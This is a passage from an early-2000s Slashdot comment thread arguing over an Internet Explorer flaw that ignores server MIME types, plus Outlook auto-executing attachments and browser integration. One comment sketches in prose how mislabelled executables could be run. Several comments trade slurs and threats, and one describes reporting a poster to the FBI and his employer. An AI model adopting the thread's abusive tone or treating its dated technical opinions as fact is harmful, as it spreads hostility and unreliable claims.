      I usually hate these bash the /. editor's posts....but I have to agree on this one.

      This post is horrible, it gives out completely false information. Michael is assuming to know the full details behind an exploit that only one person has been able to reproduce.

      I usually don't mind MS bashing, but this is just plain BAD!

      --

      ÕÕ

    3. Re:Fire Michael by Anonymous Coward · · Score: 0

      I've modded in this thread, and I don't want to undo that. This is in fact a troll, but i'll bite, just to see all the michael hating MS apologists flip out. What exactly is a good reason for this glaring, terrible, horrible security/design flaw? I can think of no other reason other than the one Michael put forth.

      This reads like a stream-of-conciousness scream from a 13-year-old who's just had his Nintendo taken away from him.

      No, it's probably Microsoft's implementation that reads like a teenage stream of conciousness.

      rfsayre, user #255559

    4. Re:Fire Michael by NatePWIII · · Score: 3, Insightful

      I would have to agree, with this one. I'm not so against the bias, everyone has their bias, especially /.'ers.

      However, the information presented in this article is telling a lie whether it be through ignorance or just for sensationalism. Please, at least research and then present semi-true information before spreading it to thousands of others, it destroys the credibility of the site and underlying organization, namely Slashdot.

      The last few weeks I have noticed the quality of Slashdot's postings has deteriorated. Alot of duplicate postings etc... I don't know maybe I'm just too critical... any thoughts along these lines?

      --

      Nathaniel P. Wilkerson
      www.haidacarver.com
    5. Re:Fire Michael by Anonymous Coward · · Score: 0

      If you don't like what /. posts then leave. go away! Why read what you don't enjoy? Filter out authors if you don't like what they post. /. doesn't claim to give un-biased news, there will always be a pro-linux spin. Deal with it or FUCK OFF.

    6. Re:Fire Michael by Anonymous Coward · · Score: 0

      It isn't a "Linux perspective" it's deceit, be it intentional or otherwise, that is NOT a Linux perspective at ALL.

      It's yet another ride on th ever-so-popular MS-bash train.

      I have my own problems with MS, PLENTY in fact, but this is just crap, anymore it's getting to the point where people are bashing MS just for the hell of it, because it's "cool" and accepted, nevermind the things they do right, let's just play up their downfalls as much as possible, and sometimes, as in this case, distort them to a ridiculous extent....

    7. Re:Fire Michael by IntlHarvester · · Score: 2

      Using local file-types instead of MIME types sent by the server has _nothing_ to do with browser-shell integration. The bug only exists when you are using HTTP - the local shell could care less about your MIME type.

      IE does this because many years ago, many UNIX-based web servers were not configured in a MS-friendly manner (most DOS & Win MIME types weren't registered on the server). Thus a user would click on MYFILE.WKS and get a text/plain response (instead of application/x-lotus123 or whatever) and a screen full of junk chars in Netscape.

      The real problem is that the cure is worse than the disease, and IE has been plagued with filetype interpretation bugs for years and years.

      Micheal's comments about anti-trust and browser integration were classic unsubstantiated trolls, IMO, although he's right about MS being stuck with preserving backwards compatibility with broken webservers. It would be nice if "Use Only MIME for file type determination" was a user option.

      --
      Business. Numbers. Money. People. Computer World.
    8. Re:Fire Michael by rfsayre · · Score: 2

      So you're saying that they designed with this problem in mind, yet somehow forgot to include any contingency/comparison code? Would this be a problem if they weren't trying to webify every legacy application?? No. Basically they're trying use their terrible three letter suffix system on the URL, which may not be an MS filesystem. The damn thing even reads cgi strings as files, if there's an extension at the end of it.

    9. Re:Fire Michael by IntlHarvester · · Score: 1

      If I didn't make myself clear: My belief is that the feature is broken (someone else has a score 5 post pointing out what a royal pain in the ass it can be), a continual security hole, and I wish I could turn it off.

      It does solve the misconfigured webserver problem, which fits MS's bill because they make lots of money off of 'legacy' apps like MS Office that need to work sorta smoothly with the web. It has absolutely nothing to do with Michael's antitrust paranoia.

      --
      Business. Numbers. Money. People. Computer World.
    10. Re:Fire Michael by ch-chuck · · Score: 2

      Nope - I have to agree w/ Michael myself, Msft gets away with leveraging one monopoly position to extend their business into everything they possibly can, incl. in this case, coming from behind with a backward web browser and via OS "integration" force it upon the 90% of the OS customers who clearly, freely, chose another company's browser before Msft caught onto this Internet thing. If some part of that "all potential 3rd party software is now a part of the OS" leveraging strategy backfires, it's a fitting comeuppance, IMHO. Sure, bashing Msft only ends up bashing yourself, they're pretty teflon coated by now, but some of us still like to tell it the way it really happened.

      Look at all the 3rd party companies that are now threatened by all that's bundeled in XP, media players, remote control, IM, cd-writers, ISP's, - a lot of them have perfectly good quality products that are going to be displaced by this so called "Operating System" - it's perfectly natural for any one of them to cackle with glee anytime one of Msft's crappy imitations screws up where their's doesn't, given that the market wasn't fairly won.

      --
      try { do() || do_not(); } catch (JediException err) { yoda(err); }
    11. Re:Fire Michael by PrimeEnd · · Score: 1
      Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.

      As far as I can tell this statement is absolutely true. What part do you disagree with? Anyone who doesn't think that Microsft has the goal of doing what is best for Microsoft (including among other things evading anti-trust law) must be living in a cave. I don't think I have heard any serious person suggest that integrating the file manager and the web browser wasn't at least partially motivated as an attempt to kill Netscape in a way that would be difficult for anti-trust law to undo.

      From what I have seen on /. Michael had some sort of conflict with some vindictive people before starting as an editor. There seems to be a small group with a vendetta against him, always trashing anything he does. I assume you are one such.

      I actually find Michael to be one of the best /. editors. He has thoughtful comments and at least he can spell and meet minimal standards of grammar.

    12. Re:Fire Michael by MindTree · · Score: 1


      Hey RETARD, do me a favor and stop reading slashdot. There's nothing worse than having to read your tripe just because some idiot moderated you up.

      As for the actual article and the actual problem, they should scare you and piss you off also. That a major corporation would pull such crap should enrage us all.

      When software companies promote software that can cripple the entire net and make sure it's on as many desktops as they can sequester they are in the wrong and deserve all the wrath and hatred that gets thrown at them.

      They are once again turning their back on the user , who paid through the nose for their bug infested, dangerous product, because they want to save face. Ask yourself, why else would they deny that such a hideous bug is a problem? I hope that you weren't effected by this problem, because if you were, or ARE, and you are not severely pissed off at the fact that your machine is vulnerable, or is possibly running DDOS attacks for some script kiddy, you don't deserve the right to have an opinion.

      My vote is: KEEP Michael! I like the stuff he posts and the way he posts it. What we need to do is work in a patch for slashcode that will eliminate, and I mean Taliban style, morons like this guy.

      Peace. Love. Linux.

    13. Re:Fire Michael by EchoMirage · · Score: 1

      I find it humourous that since posting this, the moderation has gone between 2 and 4, Interesting to Flamebait to 3/Troll now. The post has had 12 moderation points wasted on it. It seems half the community hates Michael, the other half loves him, and I'm either a troll or insightful depending on who has the mod points that hour. My favorite statement in the whole thread was this one, though:

      What we need to do is work in a patch for slashcode that will eliminate, and I mean Taliban style, morons like this guy.

      This pretty well sums up what's wrong with some of the readers here. I'm not suprised to find support for Michael from people like this - they're both pedantic. Thanks for the laugh, dude.

    14. Re:Fire Michael by Anonymous Coward · · Score: 0
      What we need to do is work in a patch for slashcode that will eliminate, and I mean Taliban style, morons like this guy.

      The original poster should enjoy that I found MindTree's posting to be harsh enough that I forwarded the post, along with his contact information conveniently linked to on his website, to the local FBI office. I also e-mailed IBM corporate with the guy's name and a copy of the post indicating what their employees were doing. Maybe next time this "software engineer" will think twice about threatening people on /.
    15. Re:Fire Michael by drinkypoo · · Score: 1
      The last few weeks I have noticed the quality of Slashdot's postings has deteriorated. Alot of duplicate postings etc... I don't know maybe I'm just too critical... any thoughts along these lines?

      The problem really is the slashdot editorship. Let's be honest, we've all submitted stories that were denied, then accepted from someone else who has stories accepted all the damn time, two days later. It's obviously completely farcical. Not to mention that the people who are allowed to successfully submit stories are usually some kind of zealot (but, I hasten to add, not always.)

      The answer, of course, is to not rely on slashdot for news; If you need information on exploits, follow bugtraq. Et cetera. Slashdot is nothing more for me at this point than a way to waste some time. When I'm not doing anything else, I sometimes visit slashdot to show off my biting wit and my clever ability to stockpile karma. Of course, since the karma kap went into effect RIGHT before I got 50 karma, that sort of blunts that effect too.

      For those of you who are wondering what to do with the time you longer spend on slashdot due to the abject lack of quality, I suggest everything2, a peer-reviewed user-supported encyclopedia. Sure, sometimes it's slower than slashdot, and the database is cleverly taken down every night during the west coast's peak geek web browsing time, but it's a really amazingly useful and interesting way to spend your time. Mind you, it's not a news site, and bears basically no resemblance to slashdot, so if you're looking for a /. replacement, that's not it. If you are looking for a way to utilize your brainpower in a way that will help others find information, but without being pissed on by the editorship like you are on slashdot, then check it out.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    16. Re:Fire Michael by MindTree · · Score: 1


      I'm sure the FBI is flooded with an abundance of the word "Taliban" these days, and I'm sure they'll appreciate your passing it on. Seeing as how I was using it to describe how SOFTWARE should eject a user, I would say that you just wasted someone's precious time. Thanks for clogging the wheels of justice.

      As for what I do with my time, I work my buns off often pulling 50+ hours a week, and I'm happy to do it. Some people go out for smoke breaks, I read slashdot. I think my breaks are a little more healthy and they keep me technically focused as I receive a lot of useful information from slashdot.

      To sum up, I didn't "threaten" anyone, just suggested that the software should expunge them with prejudice. That's my opinion. I wasn't posting an article on the front page for all the read, I was commenting on a comment that he had made, which I felt was stupid and uncalled for. Michael's work is very good and I appreciate it. My opinion. I'm just glad that you don't have super powers and feel the need to deal with crime vigilante style because you're barking up the wrong tree.

      Lastly, thanks for flaming me for including my contact information in my profile then posting as an AC, it proves my point very nicely. I prefer to be able to be CONTACTED DIRECTLY when someone has a problem with something I've done. You are a very cowardly person.

      END RANT

  82. The Internets Future? by NatePWIII · · Score: 4, Insightful

    With all of the email viruses, internet borne viruses, worms, holes, DDOS attacks, it surprises me that anyone even uses the internet or related technologies at all. It will be a sad day when the whole idea of the internet is just "dumped" because of hackers (the bad kind), holes and bandwidth abuse. It seems like daily that I read through the articles on slashdot and find a new hole, exploit or virus that is being used or abused. Take for instance the recent decision to shut down the first IRC server, because of repeated DDOS attacks, that is truly a shame. As I have said often before, abuse it and lose it...

    --

    Nathaniel P. Wilkerson
    www.haidacarver.com
    1. Re:The Internets Future? by kisak · · Score: 1

      I have to agree up to a point. But I think part of the problem is the way the problem is discussed; one talk of email viruses, internett worms, holes etc. It should be called MS Outlook email viruses, MS worms, MS IE holes, Linux viruses (do they excist yet?), Linux worms, Linux kernel holes, Unix worms, Apple viruses, etc. etc. Then people will realize that it is not so much a web and mail problem, but problems in certain programs' design. Part of the problem is that some programs should not be used to read email or surfe the web or used as webhosts until they become more secure. Which ones should be appearent to people when they get more than just the virus, worm etc description.

      --

      --- guns don't kill people, people with guns kill people ---

    2. Re:The Internets Future? by dogzilla · · Score: 1

      Yeah. You kind of have to wonder if that isn't Microsoft's plan. They don't own the Internet, and it presents a potential source of competition - or at least something they don't own/control, so maybe they don't try very hard when it comes to the net.

      --
      The crimes of eBay are a disgrace to it's pig latin heritage!
    3. Re:The Internets Future? by Eric+Gibson · · Score: 1

      I agree, but also there major design flaws in fundamental software that makes up the internet as we know it that are just inherently insecure. Like.... TCP/IP for example.

    4. Re:The Internets Future? by Doomdark · · Score: 2
      I know that analogies often blur things more than help seeing the real similarities, but I'd still like to compare Internet to other areas of life. So, let's see:
      • Driving car is very dangerous, and you get to read stories of accidents, plus rage road incidents. Is this the end of car transportation? (this can be expanded to other modes of transportation easily... left as an exercise to readers)
      • Living in many cities (especially in some neighbourhoods) is pretty dangerous, and you'll see news about people getting mugged, raped, killed, stolen from etc. every day. In fact for 90-something percent of population, crimes are every day thing, even if it's only because of wide media coverage. So do people move to remote places in countryside, to try to avoid living in cities?

      I don't think Internet problems have really gotten much worse lately. Problems are publicized regularly, but I'm not sure actual incident occurance has rised as significantly. Also, for the most part, the problems are really more "nuisances" if you compare them to accidents and crimes, "real life problems" (I know; losing contents of your hard life isn't necessarily just a nuisance... yet no one loses their life or health or loved one because of that).

      People also get more aware of problems (although because of huge inflow of novice users, average level of knowledge may have gone down) and as a result, learn how to deal with them (prevent, avoid, work-around). Thus, I think people are coping with the problems, much as they do in other areas of life. As time goes on, old problems are solved (or work-arounds are found etc)... and new ones emerge.

      Another point to consider is that improtance and usefulness of the Internet has grown by leaps and bounds. For many people it is now as essential thing to have as, say, phone line and TV, and the trend is likely to continue. The more important a thing is, more people are willing to take to be able to have/use it. Thus, even if there were more problems, it probably would still be worth the hassle.

      Which all goes to say that "doomsday for Internet" doesn't sound any more valid now than it did when mr. Metcalfe was prophecying it.

      --
      I like paying taxes. With them I buy civilization -- Oliver Wendell Holmes
    5. Re:The Internets Future? by Anonymous Coward · · Score: 0

      With all of the muggings, rapes, murders, weapons, and rabid animals, it surprises me that anyone even uses streets or related technologies at all. It will be a sad day when the whole idea of walking is just "dumped" because of criminals(the bad kind), holes and misuse. It seems like daily that I read through the articles on the boston globe and find a new way that someone got hurt. Take for instance the decision to close some roads during Halloween, so that kids didn't get run over, that is truly a shame. As I have said often before, abuse it and lose it...

  83. Ok, this is ridiculous. by Anonymous Coward · · Score: 1, Insightful

    My god, that entire post was one big MS bash fest.
    They make ZERO mention of the fact that dialog boxes DO still appear.

    From reading that article one is lead to believe that the file is just "silently" downloaded without any noticeable signs....

    I'm getting a little sick of the way certain "journalists" will downplay anything decent MS does, and blow the bad things WAY out of proportion.
    It's ludicrous!
    From this particular crowd I expected a LOT more than sensationalist garbage! If I wanted that I would bookmark CNN!

    1. Re:Ok, this is ridiculous. by Anonymous Coward · · Score: 0

      Hi Bill, good to hear from you again, give my love to melissa...
      love Karen Elliot

    2. Re:Ok, this is ridiculous. by Anonymous Coward · · Score: 0

      Oh my, how well thought out and poignant of you.

  84. I am soooo looking forward to this patch.... by (H)elix1 · · Score: 2

    Sounds like this patch (assuming they actually fix it) that will be forced by the PR gods will fix an issue that I've struggled with. IE just ignores the blody HTTP header when it comes to mime type.

    As a work-a-round, I've been adding a &whatever=foo.extention to trick IE 5+ into using the extention I need it to use. (Ugly if you need to return a PDF document from a JSP (or god help you) ASP page. I have a pretty good guess how this could be used by the forces of darkness.... never thought about "real" binarys before....

    1. Re:I am soooo looking forward to this patch.... by Anonymous Coward · · Score: 0

      God help you with your JSPs. You know why they call it Java, don't you? Because you can go get another cup of coffee while your program runs. That goes for the Java world's knock off of Active Server Pages, too. Love how you jackasses say that M$ does not innovate.

    2. Re:I am soooo looking forward to this patch.... by mrseigen · · Score: 1

      Nobody will install the patch anyways. Don't get too worked up about it.

  85. Ever use Google, Altavista, Yahoo or MSN to search by Flammon · · Score: 2, Insightful

    Then you've probably clicked on some links that took you to sites that are very little known and that could contain rogue code that exploit this IE security hole.

    I guess IE users will just have to stop using search engines then. I guess that will only affect about 80% of the Net users, so you're right, this isn't a big deal.

  86. Reply from Microsoft by Anonymous Coward · · Score: 0

    "Oh shit." -- William H. Gates, III

  87. Sweet! by Jucius+Maximus · · Score: 1
    "In English, there's no lawsuit unless the bug costs you more than buying your copy of Windows cost you."

    My friend will all be really excited about this now because he bought his copies from a guy on a street corner in Hong Kong for the equivalent of three dollars!

  88. I agree! by Ender+Ryan · · Score: 3, Insightful
    Integrating the file browser and the Web browser is completely pointless, at least as far as any implementation of this fad had gone so far.

    With both IE and Konqueror, you have a good web browser (excluding problems already mentioned with regards to IE...), and that web browser also acts as the file manager, except all that each is doing is mimicking what their predecessors did without providing any extra functionality that is inherent in a web browser.

    Sure, IE has some neato wiz-bang "features", but it's ridiculous to claim that it adds anything to local file browsing that wasn't already provided by the previous program. Same goes for Konqueror.

    Granted... they are both better file browsers than their predecessors, but that functionality is completely separate from web browsing and could be removed and used to create a totally separate file browser. There is absolutely nothing gained by integrating the two.

    --
    Sticking feathers up your butt does not make you a chicken - Tyler Durden
    1. Re:I agree! by Darth_Burrito · · Score: 1

      Of course there are things to gain... Combining multiple related products into a single product transfers several benefits:

      1) Same UI, wouldn't it be cool if instead of having an oven/a microwave/a toaster, you had an oven-owave-oaster with a single user interface? Similarly would you rather have seperate devices/volume controls for your cd, tape, and record players?

      2)In theory, you could reduce development costs in the long term since it will probably take less people to support one big application than it did to support the apps that were its parts.

    2. Re:I agree! by lubricated · · Score: 1

      > 1) Same UI, wouldn't it be cool if instead of having an oven/a microwave/a toaster, you had an oven-owave-oaster with a single user interface?

      No that would suck. These devices do diffrent things and can do them at the same time. Also if one broke you lose everything. That's why microwave ovens that are also convection ovens never became very popular.

      > Similarly would you rather have seperate devices/volume controls for your cd, tape, and record players?

      No that would also suck, I coudn't just upgrade my cd player or even replace it without replacing everything. Furthermore different types of media might need to be played at diffrent volumes.

      --
      It has been statistically shown that helmets increase the risk of head injury.
    3. Re:I agree! by Stacdaed · · Score: 1

      In all fairness KDE does do it differently, They use Kparts. This IS a good idea:

      IE: You have a 'part' witch is an html rendering engine and a 'file manager' engine and a 'file browser' engine and many more. These just do their job, and have no interface of their own! So you can call or embed any or all of them in any kde app. This way you don't have to reinvent the wheel and each can be well tuned for it's job (not to mention the ability to upgrade or replace individual ones). Konqueror itself is nothing more than interface with the menus and buttons you see. All the 'work' is done by the parts.

      This really makes it a much better system, because they are totally interchangeable. For example http://trolls.troll.no/~lars/xparts/ explains how you can instead have mozilla render INSIDE konqueror.

  89. Fine, if you're a masochist by Astral+Traveller · · Score: 1

    You can do it manually like that if you like, or you can just get 98lite and have it do the grunt work for you. Best $15 you'll ever spend if you're forced to use Windows on a semi-regular basis (for gaming, Office, etc.)

  90. Re:Now that this particular cat is out of the bag. by jbloggs · · Score: 0, Troll

    ya except rpm based distros suck ass. long live debian! (and os x)

  91. I thought this was patched by Tseuq · · Score: 1

    I'm not one generally to defend Microsoft but I distinctly remember this being an issue several months ago that we patched.

    Would the following patch not also fix the issue described here?

    http://www.microsoft.com/technet/treeview/defaul t. asp?url=/TechNet/security/bulletin/ms00-082.asp

    The technet article describes HTML emails but I wonder if the same patch wouldn't fix the general problem?

    -Tseuq

  92. laugh, it's funny by Ender+Ryan · · Score: 1
    You think IE is FREE?

    My friend, there is not free lunch, everything costs something.

    The price of IE is reflected in the price of Windows and all other Microsoft software.

    --
    Sticking feathers up your butt does not make you a chicken - Tyler Durden
  93. gcc by Meech · · Score: 1
    no major *nix tools are programmed in such a lame fashion as to simply look at file extensions.

    This is mostly true, however gcc does require certain file extensions (check 'man gcc'), and I would say that gcc is a major UNIX/Linux tool.

    1. Re:gcc by V.P. · · Score: 1
      One reason for this is that gcc can't simply check the first few bytes (the 'magic' header) of a file to decide what to do with it.

      For instance lots of C/C++/Java files begin with a huge comment, and gcc would have to read arbitrarily far into the file to determine if it's C, C++, Java or what not.

    2. Re:gcc by jrockway · · Score: 1

      Yeah, but can you really tell C and C++ apart without extensions?

      --
      My other car is first.
    3. Re:gcc by Meech · · Score: 1

      yeah, for C programs, gcc will be used, so it will look for .c extensions.

      For C++, .cc, .c++, or .cpp is acceptable because g++ is used instead of gcc. But if you wanted to get technical, the C++ compiler can complie regular C code.

  94. Re:Now that this particular cat is out of the bag. by NecroPuppy · · Score: 1

    Personally, I don't think that Linus would have allowed something like this to get through in the first place.

    But that's just me.

    --
    I like you, Stuart. You're not like everyone else, here, at Slashdot.
  95. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  96. Oh, but you can get rid of IE... by Anonymous Coward · · Score: 0

    using this.

  97. Which has more holes... by Anonymous Coward · · Score: 0

    a wedge of fine aged Swiss or Internet Explorer? Or was Internet Explorer modeled after Swiss cheese in the first place?

  98. ok, explain this to me... by k_187 · · Score: 1

    Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company?

    How is this any different from Konqueror? I may just not be understanding Konqueror, but from my limited experience it seems like the same thing. That's all I want to know,

    --
    11 was a racehorse
    12 was 12
    1111 Race
    12112
    1. Re:ok, explain this to me... by fishebulb · · Score: 1

      very good point, he chose the wrong concept to pick on. its not bad to integrate the two, konq works great. its the implementation of it

    2. Re:ok, explain this to me... by Anonymous Coward · · Score: 0

      Konqueror runs mostly on UNIX systems, which are generally not as braindead as Windows. UNIX systems use magic(5) to determine file types; MS-DOS/Windows uses the three-letter file extension. This is the problem with the IE integration into the OS, local files are not handled in the same way as remote ones. Konqueror at least does this in a sane way. There is no way a .txt could be executable in Konqueror, because 1) there's no file extension for UNIX executables, 2) they need to be chmodded +x, and 3) using file(1) or the magic(5) database will see that it is an executable.


      $ cp /bin/ls foo.txt
      $ file foo.txt
      foo.txt: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
      $

    3. Re:ok, explain this to me... by nagora · · Score: 2
      very good point, he chose the wrong concept to pick on. its not bad to integrate the two, konq works great.

      I find it a constant pain; my concept of a filesystem is nothing like my concept of the web.

      My filesystem is much more like Gopher than WWW.

      TWW

      --
      "Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
    4. Re:ok, explain this to me... by TheAwfulTruth · · Score: 2

      And on "UNIX" you can make ANY file executable by setting a permission bit! This is easily as bad if not worse! Jeez...

      --
      Contrary to popular belief, coding is not all free blow-jobs and beer. Those things cost MONEY!
    5. Re:ok, explain this to me... by fishebulb · · Score: 1

      the interface is quite similar though, atleast i like it to be. but with windows thats what you get, whereas linux you hae the choice, windows you somewhat do, but problems arise

  99. Opera crashing by Futurepower(tm) · · Score: 2


    I've had serious problems with Opera crashing the operating system when there are too many windows. I've reported this bug several times. No answer.

    --
    Bush's education improvements were
    1. Re:Opera crashing by Anonymous Coward · · Score: 0

      You're reporting it to the wrong people. If a userspace application like a web browser can crash your OS, its a bug in the OS.

      That said, if you have an ATI video card, Opera manages to tickle ATI's driver in such a way that it (the driver) crashed the whole computer. I don't know if ATI has fixed this yet.

    2. Re:Opera crashing by jaavaaguru · · Score: 2, Interesting
      Since you didn't state what OS you're using, this is a fairly unbiased comment:

      I've stated something like this before, but... If a program is causing problems like that with your operating system, then you should either:

      • fix your OS
      • get a new OS
      • or complain to your OS distributor
      since, if the operating system is crashing, there is clearly a problem with the operating system. Programs run INSIDE (or ON TOP OF) the operating system, and when they misbehave you should be able to use the OS's tools for closing them down. In a well-designed system, applications do not have enough control over the operating system to do damage to it, and even when they do have enough control, it is up to the OS to respond appropriately, instead of crashing. If a KOffice application crashed when you tried to insert an Mpeg video sample into a word processor document (if it can do this) would you blame the person who wrote the MPEG decoder? No. The application that it is running inside is to blame (in this case it would be KOffice, in your case it would be your operating system).

      Please not that I have nothing against KOffice - I merely picked a random name to illustrate my point.

    3. Re:Opera crashing by budgenator · · Score: 3, Informative

      DUH.. think about program crashes OS; gotta be Windows®. If program causes death spiral that takes 2 hrs. for system to become unresponsive, that's probably linux/unix.

      I've never had a system crash in 6 yrears of using linux®, sure I've had plenty of program crashes, I've had a few X windows lockups, two so bad I had to telnet in from the LAN to kill X-Windows to get the system back; but never a system crash.

      I've never ever had a program execute without explict permission to execute in Linux®. This new (2 1/2 year old) security vulnerabilty in Microsoft Windows® systems definately makes all of those script=kiddies look pretty stupid, they've been using things as crude as viruses all of this time.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
    4. Re:Opera crashing by jaavaaguru · · Score: 1

      I thought it was probably Windows :-) and probably not a particularly up to date version either. As someone stated earlier this week, Win2k is quite stable. I have to agree though that I've not had Linux "crash" like this person was describing. I wasn't going to jump to conclusions and start MS-bashing though... maybe there is another OS producer that doesn't know what they're meant to be doing ?:-)

    5. Re:Opera crashing by antoniol · · Score: 1

      I removed Netscape from my system about tree weeks ago, and decided to use Opera full time. I've used 5.0, 5.05, and 6.0tp2. I like the features of the browser a lot, it beats anything I've tried in that respect. However, the annoyingly incomplete implementation of CSS2 and the W3C DOM (endless JavaScript errors) make for a frustrating browsing experience. But more importantly, my system has become so unstable that I've had to hard reboot it every day for a while now. Lockups of bbkeys are extremely common (a couple of times every hour), then Blackbox freezes and I am unable to ssh into the machine from another computer on the LAN. (Last time this happened I could ping it, however). I can only blame this on Opera, as otherwise nothing has changed on the system. This is a SuSE 7.2, kernel 2.4.16, Opera dynamically linked to Qt-2.3.0

    6. Re:Opera crashing by Anonymous Coward · · Score: 0

      Hmmm..I've been using the statically-linked Opera 5 for Linux for several months, and haven't seen any such instabilities where it locks up the UI or requires hard reboots. I'm using kernel 2.4.9, though, I haven't updated to .16 yet.

    7. Re:Opera crashing by budgenator · · Score: 2

      I'm using SuSE 7.2, Opera/5.0 (Linux 2.4.2 i686; U) [en] , staticaly linked because I've had bad luck updating my KDE without problems. Last lock-up was with SuSE 6.4, that was quite a while ago.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
  100. This is a security hole that they designed.... by Meridun · · Score: 1
    The following link goes directly to an article on the MS website that I read a number of months ago. I thought it was indicative of a stupid design then, and it seems that I was right.


    Appendix A: MIME Type Detection in Internet Explorer


    Now, here's how I came across this little gem of stupidity:


    I have designed a few cgi-enabled websites (for myself) that have a rather odd feature- compiled VB cgi. This seems very strange, I'm sure, but VB is actually fairly nice for very simple programs that handle databases.


    Unfortunately, I started running into trouble when I assumed that IE played by the rules with the Content-Type headers. I naively assumed that I could generate images as well as html on the fly, and IE would display it the way it was intended, since this would be very good for displaying images that were stored in the blob field of a database.


    Wrong! It turns out, certain Content-Types are considered "ambiguous", meaning that IE assumes you don't know what you're talking about and it needs to check to see if the content actually is what you say it is. If it fails the test, then IE overrides the Content-Type and simply displays the page as what it thinks it is.


    Ok, that doesn't sound too bad, does it? Well, what if you have a file that you list as Content-Type: text/plain (which is one of the ambiguous types), but the actually data is executable! IE tests the data and decides that the Content-Type is wrong, decides to treat it as executable, and pops you a dialogue box, asking if you want to download this or open it.


    Mind you, all this time, the URL sitting in your address bar probably ends in ".html". So you say "yeah, lets open the file. .html is save, right?". Woops, there went your hard drive.


    Now, I haven't tested this scenario, since I don't have malicious intent. The real bug is probably not quite as straight-forward as this (but then again, maybe it is). However, I can't help but be disgusted at the fact that this is not an accidental oversight, but rather an unintended consequence of a boneheaded feature.

  101. incorrect by Ender+Ryan · · Score: 2
    If you receive HTML email it is rendered with IE(I believe, can't verify as I don't have Windows), exposing you to the exploit just by opening an email.

    I have received a number of emails recently attempting something like this, but I'm not using Windows so I can't say whether or not they would have been harmful.

    --
    Sticking feathers up your butt does not make you a chicken - Tyler Durden
    1. Re:incorrect by Anonymous Coward · · Score: 0

      yep, i got one of these, there was no file attachment all i did was highlight it in outlook express and bam, computer was infected.

    2. Re:incorrect by duplicate-nickname · · Score: 1

      This is actually the worm that uses a security hole that was patched last march/april.

      --

      ÕÕ

  102. Re:Umm, old news? by RedWolves2 · · Score: 1

    It is delivered with the same media but you are not offered the option of opening any files it just happens without your knowledge. Thus making it the vulerability worse if it were released to the world as a virus.

  103. I would have agreed a week ago by wirefarm · · Score: 5, Insightful

    Until one of my users got an email with an attachment that would just execute itself from the preview pane, no matter what the security settings were.

    I sat there and toyed with it (yanked the LAN cable first) and absolutely could not get it to *NOT* run automatically.
    (Her Outlook Express probably had been upgraded a month before, I think, but downloading the latest version *did* take care of the problem.

    The real question is, why does Outlook support *any* of these behaviors? Sure, occasionally it's nice to HTML-ify an email and stick in a picture, but do I really need DHTML, scripting, cookies and all of that other crap?

    When was the last time somebody had a legitimate reason for sending an embedded script in an email?
    Oh, sure, let me have my personal emails set a cookie when they get read. Sure, I'm really going to do that.

    Why not just have a really scaled-back HTML renderer that ignores tags that you choose to ignore?

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
    1. Re:I would have agreed a week ago by Yottabyte84 · · Score: 1

      Why not just have a really scaled-back HTML renderer that ignores tags that you choose to ignore?

      The Proxomitron can cause that behavior, all you have to do is add a filter to replace <foo> tags with ;lt;!----->. I belive it runs under linux with wine.

    2. Re:I would have agreed a week ago by ddent · · Score: 2

      Why not just have a really scaled-back HTML renderer that ignores tags that you choose to ignore?

      A nice start, but I have an even better idea. Why not ignore all tags you have not specifically chosen to pay attention to? As much as I hate HTML email, it is a compromise. For instance, it could allow only formatting, link, and image tags, and that's it. Sounds simple enough to implement...

    3. Re:I would have agreed a week ago by MCZapf · · Score: 2, Interesting
      Until one of my users got an email with an attachment that would just execute itself from the preview pane, no matter what the security settings were.

      This happened to me! Twice. However, for me it was Mozilla on Linux. I got some strange email with a subject line that was simply "Re: ". I clicked on the message, and the preview window starts to "render" the message by informing me it's about to execute an exe (OK/Cancel?). Now, I wasn't too worried about trying to run Windows executables on Linux. I just hit cancel and went on with my life.

      BUT...what the heck is going on here???? Is this a worm trying to exploit this MS problem? Or is it even an MS-only problem? I'm guessing that Mozilla on Windows would have executed whatever it was in the message as happily as Outlook would have!

    4. Re:I would have agreed a week ago by Anonymous Coward · · Score: 0

      Why can't we just deny all HTML mail at the MTA level? Why is this not an option for any MTA?

    5. Re:I would have agreed a week ago by MadAndy · · Score: 1
      That's BadTrans, a virus. Mozilla pops up a window asking where you want the file saved; apparently Outlook Express just goes ahead and runs it. The message itself appears empty aside from a single strange character in the top left corner of the window.

      These days we just filter all exe/scr/pif etc using a global procmail script - set up procmail as the default delivery agent and all your mail problems go away :-)

    6. Re:I would have agreed a week ago by Archfeld · · Score: 2

      You can set outlook to ignore HTML and assume all email is txt. I do, it does make for some messy emails but ensures that at least at work I am as safe as can be while condemed to M$ HELL.

      --
      errr....umm...*whooosh* *whoosh* Is this thing on ?
    7. Re:I would have agreed a week ago by blibbleblobble · · Score: 2, Informative

      Exactly! You can't put scripting and cookies in a Slashdot comment, yet you're still allowed to format it with HTML.

      I've never got an HTML email that wasn't advertising, and worse, most of them make your browser dial again to get the non-embedded images.

      If email wants to be pretty, it should look at Yahoo's IMVironments for ideas.

      (Sorry this was about outlook not IE!)

    8. Re:I would have agreed a week ago by gusnz · · Score: 2

      Outlook Express 6 has been tweaked, luckily, to address this complaint.

      By default, (which for millions of newbies is the only setting that will ever count), OE6 now loads emails within IE's "Restricted" sites zone. Translation: JavaScript totally disabled, so that gets rid of all your DHTML, scripting, cookies and all that other crap.

      If anyone is running an older version, the change is very easy. Tools->Options, Security, change to 'Restricted'. This makes sense and was a change I made in OE5, as it reduces the number of JavaScript-based viruses like KAK that have an opportunity to infect your system, and the amount of tricks spammers can pull against you.

      As an aside, moving back to the main topic, I have actually encountered a virus recently that sent itself as a .COM file attached with a mimetype of "image/gif". Luckily OE6 displayed a "broken image" link rather than run this... from memory it was a variant of the common Magistr worm. I've also seen the "image/wav" mimetype set for executable files, and that exploit is months old for any reading Slashdot editors ;).

    9. Re:I would have agreed a week ago by Rogerborg · · Score: 2
